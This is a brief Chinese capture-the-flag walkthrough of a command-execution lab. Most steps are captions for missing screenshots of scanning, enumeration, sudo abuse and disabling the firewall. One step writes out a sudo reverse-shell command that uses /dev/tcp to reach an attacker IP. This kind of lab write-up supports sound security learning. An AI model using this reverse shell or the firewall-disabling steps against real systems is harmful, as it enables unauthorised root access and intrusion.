CTF--HTTP服务--命令执行

开门见山


 

1. 扫描靶机ip,发现PCS 172.18.5.1

 CTF--HTTP服务--命令执行_第1张图片

 

 

2. 用nmap扫描靶机开放服务和服务版本

 CTF--HTTP服务--命令执行_第2张图片

 

 

3. 再扫描靶机全部信息

 CTF--HTTP服务--命令执行_第3张图片

 

 CTF--HTTP服务--命令执行_第4张图片

 

 

4. 用nikto工具扫描http服务的敏感信息

 CTF--HTTP服务--命令执行_第5张图片

 

 

5. 打开浏览器查看发现的网页

 CTF--HTTP服务--命令执行_第6张图片

 

 

6. 查看临时缓冲目录

 CTF--HTTP服务--命令执行_第7张图片

 

 

7. 查看home目录,挖掘用户信息

 CTF--HTTP服务--命令执行_第8张图片

 

 

8. 查看具体用户的目录

 CTF--HTTP服务--命令执行_第9张图片

 

 

9. 查看靶机的信息

 CTF--HTTP服务--命令执行_第10张图片

 

 

10. 利用ssh命令,执行root权限命令

 CTF--HTTP服务--命令执行_第11张图片

 

 

11. 用bill执行root权限关闭防火墙

 CTF--HTTP服务--命令执行_第12张图片

 

 

12. 攻击机启动监听

 

 

 

 

13. 靶机反弹shell,使用命令:ssh bill@localhost sudo bash -i >& /dev/tcp/172.18.5.251/4444 0>& 1

 

 

 

14. 攻击机终端收到反馈shell

 CTF--HTTP服务--命令执行_第13张图片

 

 

15. 还有一种shell反弹

 CTF--HTTP服务--命令执行_第14张图片

 

 

16. 在 /root目录下查找flag文件并查看

 CTF--HTTP服务--命令执行_第15张图片

 

 


 

你可能感兴趣的:(CTF--HTTP服务--命令执行)